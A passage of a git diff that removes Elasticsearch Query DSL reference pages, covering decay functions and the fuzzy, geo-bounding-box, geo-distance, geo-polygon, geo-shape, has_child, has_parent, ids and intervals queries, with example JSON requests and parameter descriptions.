{ - "functions": [ - { - "gauss": { - "price": { - "origin": "0", - "scale": "20" - } - } - }, - { - "gauss": { - "location": { - "origin": "11, 12", - "scale": "2km" - } - } - } - ], - "query": { - "match": { - "properties": "balcony" - } - }, - "score_mode": "multiply" - } - } -} --------------------------------------------------- - -Next, we show how the computed score looks like for each of the three -possible decay functions. - -[[gauss-decay]] -===== Normal decay, keyword `gauss` - -When choosing `gauss` as the decay function in the above example, the -contour and surface plot of the multiplier looks like this: - -image::https://f.cloud.github.com/assets/4320215/768157/cd0e18a6-e898-11e2-9b3c-f0145078bd6f.png[width="700px"] - -image::https://f.cloud.github.com/assets/4320215/768160/ec43c928-e898-11e2-8e0d-f3c4519dbd89.png[width="700px"] - -Suppose your original search results matches three hotels : - -* "Backback Nap" -* "Drink n Drive" -* "BnB Bellevue". - -"Drink n Drive" is pretty far from your defined location (nearly 2 km) -and is not too cheap (about 13 Euros) so it gets a low factor a factor -of 0.56. "BnB Bellevue" and "Backback Nap" are both pretty close to the -defined location but "BnB Bellevue" is cheaper, so it gets a multiplier -of 0.86 whereas "Backpack Nap" gets a value of 0.66. - -[[exp-decay]] -===== Exponential decay, keyword `exp` - -When choosing `exp` as the decay function in the above example, the -contour and surface plot of the multiplier looks like this: - -image::https://f.cloud.github.com/assets/4320215/768161/082975c0-e899-11e2-86f7-174c3a729d64.png[width="700px"] - -image::https://f.cloud.github.com/assets/4320215/768162/0b606884-e899-11e2-907b-aefc77eefef6.png[width="700px"] - -[[linear-decay]] -===== Linear decay, keyword `linear` - -When choosing `linear` as the decay function in the above example, the -contour and surface plot of the multiplier looks like this: - -image::https://f.cloud.github.com/assets/4320215/768164/1775b0ca-e899-11e2-9f4a-776b406305c6.png[width="700px"] - -image::https://f.cloud.github.com/assets/4320215/768165/19d8b1aa-e899-11e2-91bc-6b0553e8d722.png[width="700px"] - -==== Supported fields for decay functions - -Only numeric, date, and geo-point fields are supported. - -==== What if a field is missing? - -If the numeric field is missing in the document, the function will -return 1. diff --git a/docs/reference/query-dsl/fuzzy-query.asciidoc b/docs/reference/query-dsl/fuzzy-query.asciidoc deleted file mode 100644 index 6a9b6010a1f..00000000000 --- a/docs/reference/query-dsl/fuzzy-query.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[[query-dsl-fuzzy-query]] -=== Fuzzy query -++++ -Fuzzy -++++ - -Returns documents that contain terms similar to the search term, as measured by -a {wikipedia}/Levenshtein_distance[Levenshtein edit distance]. - -An edit distance is the number of one-character changes needed to turn one term -into another. These changes can include: - -* Changing a character (**b**ox → **f**ox) -* Removing a character (**b**lack → lack) -* Inserting a character (sic → sic**k**) -* Transposing two adjacent characters (**ac**t → **ca**t) - -To find similar terms, the `fuzzy` query creates a set of all possible -variations, or expansions, of the search term within a specified edit distance. -The query then returns exact matches for each expansion. - -[[fuzzy-query-ex-request]] -==== Example requests - -[[fuzzy-query-ex-simple]] -===== Simple example - -[source,console] ----- -GET /_search -{ - "query": { - "fuzzy": { - "user.id": { - "value": "ki" - } - } - } -} ----- - -[[fuzzy-query-ex-advanced]] -===== Example using advanced parameters - -[source,console] ----- -GET /_search -{ - "query": { - "fuzzy": { - "user.id": { - "value": "ki", - "fuzziness": "AUTO", - "max_expansions": 50, - "prefix_length": 0, - "transpositions": true, - "rewrite": "constant_score" - } - } - } -} ----- - -[[fuzzy-query-top-level-params]] -==== Top-level parameters for `fuzzy` -``:: -(Required, object) Field you wish to search. - -[[fuzzy-query-field-params]] -==== Parameters for `` -`value`:: -(Required, string) Term you wish to find in the provided ``. - -`fuzziness`:: -(Optional, string) Maximum edit distance allowed for matching. See <> -for valid values and more information. - - -`max_expansions`:: -+ --- -(Optional, integer) Maximum number of variations created. Defaults to `50`. - -WARNING: Avoid using a high value in the `max_expansions` parameter, especially -if the `prefix_length` parameter value is `0`. High values in the -`max_expansions` parameter can cause poor performance due to the high number of -variations examined. --- - -`prefix_length`:: -(Optional, integer) Number of beginning characters left unchanged when creating -expansions. Defaults to `0`. - -`transpositions`:: -(Optional, Boolean) Indicates whether edits include transpositions of two -adjacent characters (ab → ba). Defaults to `true`. - -`rewrite`:: -(Optional, string) Method used to rewrite the query. For valid values and more -information, see the <>. - -[[fuzzy-query-notes]] -==== Notes -Fuzzy queries will not be executed if <> -is set to false. diff --git a/docs/reference/query-dsl/geo-bounding-box-query.asciidoc b/docs/reference/query-dsl/geo-bounding-box-query.asciidoc deleted file mode 100644 index ca355413b2e..00000000000 --- a/docs/reference/query-dsl/geo-bounding-box-query.asciidoc +++ /dev/null @@ -1,368 +0,0 @@ -[[query-dsl-geo-bounding-box-query]] -=== Geo-bounding box query -++++ -Geo-bounding box -++++ - -A query allowing to filter hits based on a point location using a -bounding box. Assuming the following indexed document: - -[source,console] --------------------------------------------------- -PUT /my_locations -{ - "mappings": { - "properties": { - "pin": { - "properties": { - "location": { - "type": "geo_point" - } - } - } - } - } -} - -PUT /my_locations/_doc/1 -{ - "pin": { - "location": { - "lat": 40.12, - "lon": -71.34 - } - } -} --------------------------------------------------- -// TESTSETUP - -Then the following simple query can be executed with a -`geo_bounding_box` filter: - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": { - "lat": 40.73, - "lon": -74.1 - }, - "bottom_right": { - "lat": 40.01, - "lon": -71.12 - } - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== Query Options - -[cols="<,<",options="header",] -|======================================================================= -|Option |Description -|`_name` |Optional name field to identify the filter - -|`validation_method` |Set to `IGNORE_MALFORMED` to -accept geo points with invalid latitude or longitude, set to -`COERCE` to also try to infer correct latitude or longitude. (default is `STRICT`). - -|`type` |Set to one of `indexed` or `memory` to defines whether this filter will -be executed in memory or indexed. See <> below for further details -Default is `memory`. -|======================================================================= - -[[query-dsl-geo-bounding-box-query-accepted-formats]] -[discrete] -==== Accepted Formats - -In much the same way the geo_point type can accept different -representations of the geo point, the filter can accept it as well: - -[discrete] -===== Lat Lon As Properties - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": { - "lat": 40.73, - "lon": -74.1 - }, - "bottom_right": { - "lat": 40.01, - "lon": -71.12 - } - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Lat Lon As Array - -Format in `[lon, lat]`, note, the order of lon/lat here in order to -conform with http://geojson.org/[GeoJSON]. - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": [ -74.1, 40.73 ], - "bottom_right": [ -71.12, 40.01 ] - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Lat Lon As String - -Format in `lat,lon`. - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": "40.73, -74.1", - "bottom_right": "40.01, -71.12" - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Bounding Box as Well-Known Text (WKT) - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "wkt": "BBOX (-74.1, -71.12, 40.73, 40.01)" - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Geohash - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": "dr5r9ydj2y73", - "bottom_right": "drj7teegpus6" - } - } - } - } - } -} --------------------------------------------------- - - -When geohashes are used to specify the bounding the edges of the -bounding box, the geohashes are treated as rectangles. The bounding -box is defined in such a way that its top left corresponds to the top -left corner of the geohash specified in the `top_left` parameter and -its bottom right is defined as the bottom right of the geohash -specified in the `bottom_right` parameter. - -In order to specify a bounding box that would match entire area of a -geohash the geohash can be specified in both `top_left` and -`bottom_right` parameters: - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "geo_bounding_box": { - "pin.location": { - "top_left": "dr", - "bottom_right": "dr" - } - } - } -} --------------------------------------------------- - -In this example, the geohash `dr` will produce the bounding box -query with the top left corner at `45.0,-78.75` and the bottom right -corner at `39.375,-67.5`. - -[discrete] -==== Vertices - -The vertices of the bounding box can either be set by `top_left` and -`bottom_right` or by `top_right` and `bottom_left` parameters. More -over the names `topLeft`, `bottomRight`, `topRight` and `bottomLeft` -are supported. Instead of setting the values pairwise, one can use -the simple names `top`, `left`, `bottom` and `right` to set the -values separately. - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top": 40.73, - "left": -74.1, - "bottom": 40.01, - "right": -71.12 - } - } - } - } - } -} --------------------------------------------------- - - -[discrete] -==== geo_point Type - -The filter *requires* the `geo_point` type to be set on the relevant -field. - -[discrete] -==== Multi Location Per Document - -The filter can work with multiple locations / points per document. Once -a single location / point matches the filter, the document will be -included in the filter - -[discrete] -[[geo-bbox-type]] -==== Type - -The type of the bounding box execution by default is set to `memory`, -which means in memory checks if the doc falls within the bounding box -range. In some cases, an `indexed` option will perform faster (but note -that the `geo_point` type must have lat and lon indexed in this case). -Note, when using the indexed option, multi locations per document field -are not supported. Here is an example: - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": { - "lat": 40.73, - "lon": -74.1 - }, - "bottom_right": { - "lat": 40.10, - "lon": -71.12 - } - }, - "type": "indexed" - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== Ignore Unmapped - -When set to `true` the `ignore_unmapped` option will ignore an unmapped field -and will not match any documents for this query. This can be useful when -querying multiple indexes which might have different mappings. When set to -`false` (the default value) the query will throw an exception if the field -is not mapped. - -[discrete] -==== Notes on Precision - -Geopoints have limited precision and are always rounded down during index time. -During the query time, upper boundaries of the bounding boxes are rounded down, -while lower boundaries are rounded up. As a result, the points along on the -lower bounds (bottom and left edges of the bounding box) might not make it into -the bounding box due to the rounding error. At the same time points alongside -the upper bounds (top and right edges) might be selected by the query even if -they are located slightly outside the edge. The rounding error should be less -than 4.20e-8 degrees on the latitude and less than 8.39e-8 degrees on the -longitude, which translates to less than 1cm error even at the equator. diff --git a/docs/reference/query-dsl/geo-distance-query.asciidoc b/docs/reference/query-dsl/geo-distance-query.asciidoc deleted file mode 100644 index cfb2779659e..00000000000 --- a/docs/reference/query-dsl/geo-distance-query.asciidoc +++ /dev/null @@ -1,221 +0,0 @@ -[[query-dsl-geo-distance-query]] -=== Geo-distance query -++++ -Geo-distance -++++ - -Filters documents that include only hits that exists within a specific -distance from a geo point. Assuming the following mapping and indexed -document: - -[source,console] --------------------------------------------------- -PUT /my_locations -{ - "mappings": { - "properties": { - "pin": { - "properties": { - "location": { - "type": "geo_point" - } - } - } - } - } -} - -PUT /my_locations/_doc/1 -{ - "pin": { - "location": { - "lat": 40.12, - "lon": -71.34 - } - } -} --------------------------------------------------- -// TESTSETUP - - -Then the following simple query can be executed with a `geo_distance` -filter: - -[source,console] --------------------------------------------------- -GET /my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "200km", - "pin.location": { - "lat": 40, - "lon": -70 - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== Accepted Formats - -In much the same way the `geo_point` type can accept different -representations of the geo point, the filter can accept it as well: - -[discrete] -===== Lat Lon As Properties - -[source,console] --------------------------------------------------- -GET /my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "12km", - "pin.location": { - "lat": 40, - "lon": -70 - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Lat Lon As Array - -Format in `[lon, lat]`, note, the order of lon/lat here in order to -conform with http://geojson.org/[GeoJSON]. - -[source,console] --------------------------------------------------- -GET /my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "12km", - "pin.location": [ -70, 40 ] - } - } - } - } -} --------------------------------------------------- - - -[discrete] -===== Lat Lon As String - -Format in `lat,lon`. - -[source,console] --------------------------------------------------- -GET /my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "12km", - "pin.location": "40,-70" - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Geohash - -[source,console] --------------------------------------------------- -GET /my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "12km", - "pin.location": "drm3btev3e86" - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== Options - -The following are options allowed on the filter: - -[horizontal] - -`distance`:: - - The radius of the circle centred on the specified location. Points which - fall into this circle are considered to be matches. The `distance` can be - specified in various units. See <>. - -`distance_type`:: - - How to compute the distance. Can either be `arc` (default), or `plane` (faster, but inaccurate on long distances and close to the poles). - -`_name`:: - - Optional name field to identify the query - -`validation_method`:: - - Set to `IGNORE_MALFORMED` to accept geo points with invalid latitude or - longitude, set to `COERCE` to additionally try and infer correct - coordinates (default is `STRICT`). - -[discrete] -==== geo_point Type - -The filter *requires* the `geo_point` type to be set on the relevant -field. - -[discrete] -==== Multi Location Per Document - -The `geo_distance` filter can work with multiple locations / points per -document. Once a single location / point matches the filter, the -document will be included in the filter. - -[discrete] -==== Ignore Unmapped - -When set to `true` the `ignore_unmapped` option will ignore an unmapped field -and will not match any documents for this query. This can be useful when -querying multiple indexes which might have different mappings. When set to -`false` (the default value) the query will throw an exception if the field -is not mapped. diff --git a/docs/reference/query-dsl/geo-polygon-query.asciidoc b/docs/reference/query-dsl/geo-polygon-query.asciidoc deleted file mode 100644 index c3588133211..00000000000 --- a/docs/reference/query-dsl/geo-polygon-query.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[[query-dsl-geo-polygon-query]] -=== Geo-polygon query -++++ -Geo-polygon -++++ - -A query returning hits that only fall within a polygon of -points. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_polygon": { - "person.location": { - "points": [ - { "lat": 40, "lon": -70 }, - { "lat": 30, "lon": -80 }, - { "lat": 20, "lon": -90 } - ] - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== Query Options - -[cols="<,<",options="header",] -|======================================================================= -|Option |Description -|`_name` |Optional name field to identify the filter - -|`validation_method` |Set to `IGNORE_MALFORMED` to accept geo points with -invalid latitude or longitude, `COERCE` to try and infer correct latitude -or longitude, or `STRICT` (default is `STRICT`). -|======================================================================= - -[discrete] -==== Allowed Formats - -[discrete] -===== Lat Long as Array - -Format as `[lon, lat]` - -Note: the order of lon/lat here must -conform with http://geojson.org/[GeoJSON]. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_polygon": { - "person.location": { - "points": [ - [ -70, 40 ], - [ -80, 30 ], - [ -90, 20 ] - ] - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Lat Lon as String - -Format in `lat,lon`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_polygon": { - "person.location": { - "points": [ - "40, -70", - "30, -80", - "20, -90" - ] - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Geohash - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_polygon": { - "person.location": { - "points": [ - "drn5x1g8cu2y", - "30, -80", - "20, -90" - ] - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== geo_point Type - -The query *requires* the <> type to be set on the -relevant field. - -[discrete] -==== Ignore Unmapped - -When set to `true` the `ignore_unmapped` option will ignore an unmapped field -and will not match any documents for this query. This can be useful when -querying multiple indexes which might have different mappings. When set to -`false` (the default value) the query will throw an exception if the field -is not mapped. diff --git a/docs/reference/query-dsl/geo-queries.asciidoc b/docs/reference/query-dsl/geo-queries.asciidoc deleted file mode 100644 index b4eb86763e7..00000000000 --- a/docs/reference/query-dsl/geo-queries.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[[geo-queries]] -== Geo queries - -Elasticsearch supports two types of geo data: -<> fields which support lat/lon pairs, and -<> fields, which support points, -lines, circles, polygons, multi-polygons, etc. - -The queries in this group are: - -<> query:: -Finds documents with geo-points that fall into the specified rectangle. - -<> query:: -Finds documents with geo-points within the specified distance of a central point. - -<> query:: -Find documents with geo-points within the specified polygon. - -<> query:: -Finds documents with: -* `geo-shapes` which either intersect, are contained by, or do not intersect -with the specified geo-shape -* `geo-points` which intersect the specified -geo-shape - -include::geo-bounding-box-query.asciidoc[] - -include::geo-distance-query.asciidoc[] - -include::geo-polygon-query.asciidoc[] - -include::geo-shape-query.asciidoc[] diff --git a/docs/reference/query-dsl/geo-shape-query.asciidoc b/docs/reference/query-dsl/geo-shape-query.asciidoc deleted file mode 100644 index 65792479a83..00000000000 --- a/docs/reference/query-dsl/geo-shape-query.asciidoc +++ /dev/null @@ -1,317 +0,0 @@ -[[query-dsl-geo-shape-query]] -=== Geo-shape query -++++ -Geo-shape -++++ - -Filter documents indexed using the `geo_shape` or `geo_point` type. - -Requires the <> or the -<>. - -The `geo_shape` query uses the same grid square representation as the -`geo_shape` mapping to find documents that have a shape that intersects -with the query shape. It will also use the same Prefix Tree configuration -as defined for the field mapping. - -The query supports two ways of defining the query shape, either by -providing a whole shape definition, or by referencing the name of a shape -pre-indexed in another index. Both formats are defined below with -examples. - - -==== Inline Shape Definition - -Similar to the `geo_shape` type, the `geo_shape` query uses -http://geojson.org[GeoJSON] to represent shapes. - -Given the following index with locations as `geo_shape` fields: - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "location": { - "type": "geo_shape" - } - } - } -} - -POST /example/_doc?refresh -{ - "name": "Wind & Wetter, Berlin, Germany", - "location": { - "type": "point", - "coordinates": [ 13.400544, 52.530286 ] - } -} --------------------------------------------------- -// TESTSETUP - - -The following query will find the point using {es}'s `envelope` GeoJSON -extension: - -[source,console] --------------------------------------------------- -GET /example/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_shape": { - "location": { - "shape": { - "type": "envelope", - "coordinates": [ [ 13.0, 53.0 ], [ 14.0, 52.0 ] ] - }, - "relation": "within" - } - } - } - } - } -} --------------------------------------------------- - - -The above query can, similarly, be queried on `geo_point` fields. - -[source,console] --------------------------------------------------- -PUT /example_points -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -PUT /example_points/_doc/1?refresh -{ - "name": "Wind & Wetter, Berlin, Germany", - "location": [13.400544, 52.530286] -} --------------------------------------------------- -// TEST[continued] - - -Using the same query, the documents with matching `geo_point` fields are -returned. - -[source,console] --------------------------------------------------- -GET /example_points/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_shape": { - "location": { - "shape": { - "type": "envelope", - "coordinates": [ [ 13.0, 53.0 ], [ 14.0, 52.0 ] ] - }, - "relation": "intersects" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took" : 17, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 1, - "relation" : "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "example_points", - "_type" : "_doc", - "_id" : "1", - "_score" : 1.0, - "_source" : { - "name": "Wind & Wetter, Berlin, Germany", - "location": [13.400544, 52.530286] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 17/"took" : $body.took/] - - -==== Pre-Indexed Shape - -The query also supports using a shape which has already been indexed in another -index. This is particularly useful for when you have a pre-defined list of -shapes and you want to reference the list using -a logical name (for example 'New Zealand') rather than having to provide -coordinates each time. In this situation, it is only necessary to provide: - -* `id` - The ID of the document that containing the pre-indexed shape. -* `index` - Name of the index where the pre-indexed shape is. Defaults to -'shapes'. -* `path` - The field specified as path containing the pre-indexed shape. -Defaults to 'shape'. -* `routing` - The routing of the shape document if required. - -The following is an example of using the Filter with a pre-indexed -shape: - -[source,console] --------------------------------------------------- -PUT /shapes -{ - "mappings": { - "properties": { - "location": { - "type": "geo_shape" - } - } - } -} - -PUT /shapes/_doc/deu -{ - "location": { - "type": "envelope", - "coordinates" : [[13.0, 53.0], [14.0, 52.0]] - } -} - -GET /example/_search -{ - "query": { - "bool": { - "filter": { - "geo_shape": { - "location": { - "indexed_shape": { - "index": "shapes", - "id": "deu", - "path": "location" - } - } - } - } - } - } -} --------------------------------------------------- - - -==== Spatial Relations - -The <> mapping parameter determines which -spatial relation operators may be used at search time. - -The following is a complete list of spatial relation operators available when -searching a field of type `geo_shape`: - -* `INTERSECTS` - (default) Return all documents whose `geo_shape` field -intersects the query geometry. -* `DISJOINT` - Return all documents whose `geo_shape` field has nothing in -common with the query geometry. -* `WITHIN` - Return all documents whose `geo_shape` field is within the query -geometry. -* `CONTAINS` - Return all documents whose `geo_shape` field contains the query -geometry. - -When searching a field of type `geo_point` there is a single supported spatial -relation operator: - -* `INTERSECTS` - (default) Return all documents whose `geo_point` field -intersects the query geometry. - - -[discrete] -==== Ignore Unmapped - -When set to `true` the `ignore_unmapped` option will ignore an unmapped field -and will not match any documents for this query. This can be useful when -querying multiple indexes which might have different mappings. When set to -`false` (the default value) the query will throw an exception if the field -is not mapped. - - -==== Shape Types supported for Geo-Point - -When searching a field of type `geo_point` the following shape types are not -supported: - -* `POINT` -* `LINE` -* `MULTIPOINT` -* `MULTILINE` - -[[geo-shape-query-notes]] -==== Notes - -* Geo-shape queries on geo-shapes implemented with - <> will not be executed if - <> is set - to false. - - -* When data is indexed in a `geo_shape` field as an array of shapes, the arrays - are treated as one shape. For this reason, the following requests are - equivalent. - -[source,console] --------------------------------------------------- -PUT /test/_doc/1 -{ - "location": [ - { - "coordinates": [46.25,20.14], - "type": "point" - }, - { - "coordinates": [47.49,19.04], - "type": "point" - } - ] -} --------------------------------------------------- - - -[source,console] --------------------------------------------------- -PUT /test/_doc/1 -{ - "location": - { - "coordinates": [[46.25,20.14],[47.49,19.04]], - "type": "multipoint" - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/has-child-query.asciidoc b/docs/reference/query-dsl/has-child-query.asciidoc deleted file mode 100644 index 7b8158aaab5..00000000000 --- a/docs/reference/query-dsl/has-child-query.asciidoc +++ /dev/null @@ -1,158 +0,0 @@ -[[query-dsl-has-child-query]] -=== Has child query -++++ -Has child -++++ - -Returns parent documents whose <> child documents match a -provided query. You can create parent-child relationships between documents in -the same index using a <> field mapping. - -[WARNING] -==== -Because it performs a join, the `has_child` is slow compared to other queries. -Its performance degrades as the number of matching child documents pointing to -unique parent documents increases. Each `has_child` query in a search can -increase query time significantly. - -If you care about query performance, do not use this query. If you need to use -the `has_child` query, use it as rarely as possible. -==== - -[[has-child-query-ex-request]] -==== Example request - -[[has-child-index-setup]] -===== Index setup -To use the `has_child` query, your index must include a <> -field mapping. For example: - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "my-join-field": { - "type": "join", - "relations": { - "parent": "child" - } - } - } - } -} - ----- -// TESTSETUP - -[[has-child-query-ex-query]] -===== Example query - -[source,console] ----- -GET /_search -{ - "query": { - "has_child": { - "type": "child", - "query": { - "match_all": {} - }, - "max_children": 10, - "min_children": 2, - "score_mode": "min" - } - } -} ----- - -[[has-child-top-level-params]] -==== Top-level parameters for `has_child` - -`type`:: -(Required, string) Name of the child relationship mapped for the -<> field. - -`query`:: -(Required, query object) Query you wish to run on child documents of the `type` -field. If a child document matches the search, the query returns the parent -document. - -`ignore_unmapped`:: -+ --- -(Optional, Boolean) Indicates whether to ignore an unmapped `type` and not -return any documents instead of an error. Defaults to `false`. - -If `false`, {es} returns an error if the `type` is unmapped. - -You can use this parameter to query multiple indices that may not contain the -`type`. --- - -`max_children`:: -(Optional, integer) Maximum number of child documents that match the `query` -allowed for a returned parent document. If the parent document exceeds this -limit, it is excluded from the search results. - -`min_children`:: -(Optional, integer) Minimum number of child documents that match the `query` -required to match the query for a returned parent document. If the parent -document does not meet this limit, it is excluded from the search results. - -`score_mode`:: -+ --- -(Optional, string) Indicates how scores for matching child documents affect the -root parent document's <>. Valid values -are: - -`none` (Default):: -Do not use the relevance scores of matching child documents. The query assigns -parent documents a score of `0`. - -`avg`:: -Use the mean relevance score of all matching child documents. - -`max`:: -Uses the highest relevance score of all matching child documents. - -`min`:: -Uses the lowest relevance score of all matching child documents. - -`sum`:: -Add together the relevance scores of all matching child documents. --- - -[[has-child-query-notes]] -==== Notes - -[[has-child-query-performance]] -===== Sorting -You cannot sort the results of a `has_child` query using standard -<>. - -If you need to sort returned documents by a field in their child documents, use -a `function_score` query and sort by `_score`. For example, the following query -sorts returned documents by the `click_count` field of their child documents. - -[source,console] ----- -GET /_search -{ - "query": { - "has_child": { - "type": "child", - "query": { - "function_score": { - "script_score": { - "script": "_score * doc['click_count'].value" - } - } - }, - "score_mode": "max" - } - } -} ----- diff --git a/docs/reference/query-dsl/has-parent-query.asciidoc b/docs/reference/query-dsl/has-parent-query.asciidoc deleted file mode 100644 index 6c4148a8dad..00000000000 --- a/docs/reference/query-dsl/has-parent-query.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[query-dsl-has-parent-query]] -=== Has parent query -++++ -Has parent -++++ - -Returns child documents whose <> parent document matches a -provided query. You can create parent-child relationships between documents in -the same index using a <> field mapping. - -[WARNING] -==== -Because it performs a join, the `has_parent` query is slow compared to other queries. -Its performance degrades as the number of matching parent documents increases. -Each `has_parent` query in a search can increase query time significantly. -==== - -[[has-parent-query-ex-request]] -==== Example request - -[[has-parent-index-setup]] -===== Index setup -To use the `has_parent` query, your index must include a <> -field mapping. For example: - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "my-join-field": { - "type": "join", - "relations": { - "parent": "child" - } - }, - "tag": { - "type": "keyword" - } - } - } -} - ----- -// TESTSETUP - -[[has-parent-query-ex-query]] -===== Example query - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "has_parent": { - "parent_type": "parent", - "query": { - "term": { - "tag": { - "value": "Elasticsearch" - } - } - } - } - } -} ----- - -[[has-parent-top-level-params]] -==== Top-level parameters for `has_parent` - -`parent_type`:: -(Required, string) Name of the parent relationship mapped for the -<> field. - -`query`:: -(Required, query object) Query you wish to run on parent documents of the -`parent_type` field. If a parent document matches the search, the query returns -its child documents. - -`score`:: -+ --- -(Optional, Boolean) Indicates whether the <> of a matching parent document is aggregated into its child documents. -Defaults to `false`. - -If `false`, {es} ignores the relevance score of the parent document. {es} also -assigns each child document a relevance score equal to the `query`'s `boost`, -which defaults to `1`. - -If `true`, the relevance score of the matching parent document is aggregated -into its child documents' relevance scores. --- - -`ignore_unmapped`:: -+ --- -(Optional, Boolean) Indicates whether to ignore an unmapped `parent_type` and -not return any documents instead of an error. Defaults to `false`. - -If `false`, {es} returns an error if the `parent_type` is unmapped. - -You can use this parameter to query multiple indices that may not contain the -`parent_type`. --- - -[[has-parent-query-notes]] -==== Notes - -[[has-parent-query-performance]] -===== Sorting -You cannot sort the results of a `has_parent` query using standard -<>. - -If you need to sort returned documents by a field in their parent documents, use -a `function_score` query and sort by `_score`. For example, the following query -sorts returned documents by the `view_count` field of their parent documents. - -[source,console] ----- -GET /_search -{ - "query": { - "has_parent": { - "parent_type": "parent", - "score": true, - "query": { - "function_score": { - "script_score": { - "script": "_score * doc['view_count'].value" - } - } - } - } - } -} ----- diff --git a/docs/reference/query-dsl/ids-query.asciidoc b/docs/reference/query-dsl/ids-query.asciidoc deleted file mode 100644 index cf7ad4d8c10..00000000000 --- a/docs/reference/query-dsl/ids-query.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[query-dsl-ids-query]] -=== IDs -++++ -IDs -++++ - -Returns documents based on their IDs. This query uses document IDs stored in -the <> field. - -==== Example request - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "ids" : { - "values" : ["1", "4", "100"] - } - } -} --------------------------------------------------- - -[[ids-query-top-level-parameters]] -==== Top-level parameters for `ids` - -`values`:: -(Required, array of strings) An array of <>. \ No newline at end of file diff --git a/docs/reference/query-dsl/intervals-query.asciidoc b/docs/reference/query-dsl/intervals-query.asciidoc deleted file mode 100644 index b408e04a6b8..00000000000 --- a/docs/reference/query-dsl/intervals-query.asciidoc +++ /dev/null @@ -1,464 +0,0 @@ -[[query-dsl-intervals-query]] -=== Intervals query -++++ -Intervals -++++ - -Returns documents based on the order and proximity of matching terms. - -The `intervals` query uses *matching rules*, constructed from a small set of -definitions. These rules are then applied to terms from a specified `field`. - -The definitions produce sequences of minimal intervals that span terms in a -body of text. These intervals can be further combined and filtered by -parent sources. - - -[[intervals-query-ex-request]] -==== Example request - -The following `intervals` search returns documents containing `my -favorite food` immediately followed by `hot water` or `cold porridge` in the -`my_text` field. - -This search would match a `my_text` value of `my favorite food is cold -porridge` but not `when it's cold my favorite food is porridge`. - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "all_of" : { - "ordered" : true, - "intervals" : [ - { - "match" : { - "query" : "my favorite food", - 